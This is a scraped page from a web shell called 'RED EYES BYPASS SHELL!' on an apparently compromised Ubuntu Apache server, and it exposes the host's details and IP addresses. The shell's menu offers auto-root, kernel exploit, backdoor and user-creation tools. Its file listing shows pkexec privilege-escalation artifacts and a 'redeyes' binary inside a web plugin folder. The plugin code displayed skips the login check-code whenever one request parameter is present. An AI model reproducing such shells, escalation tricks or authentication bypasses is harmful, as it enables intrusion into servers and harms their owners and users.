Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
plugins /
zipView /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
app.php
1.83
KB
-rwxr-xr-x
package.json
945
B
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.php
<?php class zipViewPlugin extends PluginBase{ function __construct(){ parent::__construct(); } public function regiest(){ $this->hookRegiest(array( 'user.commonJs.insert' => 'zipViewPlugin.echoJs', 'globalRequest'=>'zipViewPlugin.changeData', )); } public function changeData(){ $GLOBALS['config']['pathRoleDefine']['read']['preview'] = array('explorer.image','explorer.unzipList','explorer.fileProxy','explorer.fileView','editor.fileGet'); //临时 if(isset($_REQUEST['HTTP_X_PLATFORM'])){ $GLOBALS['config']['settingSystem']['needCheckCode'] = false; } } public function unzipList(){ $maxLength = 50000; $path = $this->filePath($this->in['path']); if(isset($this->in['index'])){ $download = isset($this->in['download'])?true:false; KodArchive::filePreview($path,$this->in['index'],$download,$this->in['name']); }else{ $cacheFile = TEMP_PATH.'zipView/'.hash_path($path).'.log'; if(file_exists($cacheFile)){ $content = file_get_contents($cacheFile); $data = json_decode($content,true); if( count($data) >= $maxLength ){ show_json("包含内容太多(".count($data)."项),请在本地打开查看;",false); } show_json($data); } mk_dir(get_path_father($cacheFile)); $result = KodArchive::listContent($path); $data = json_encode($result['data']); if( count($result['data']) >= $maxLength ){ show_json("包含内容太多(".count($result['data'])."项),请在本地打开查看;",false); } if($result['code'] && $data){ file_put_contents($cacheFile,$data); show_json($result['data'],$result['code']); }else{ show_json($result['data'],false); } } } public function echoJs($st,$act){ if($this->isFileExtence($st,$act)){ $this->echoFile('static/main.js'); } } }
Close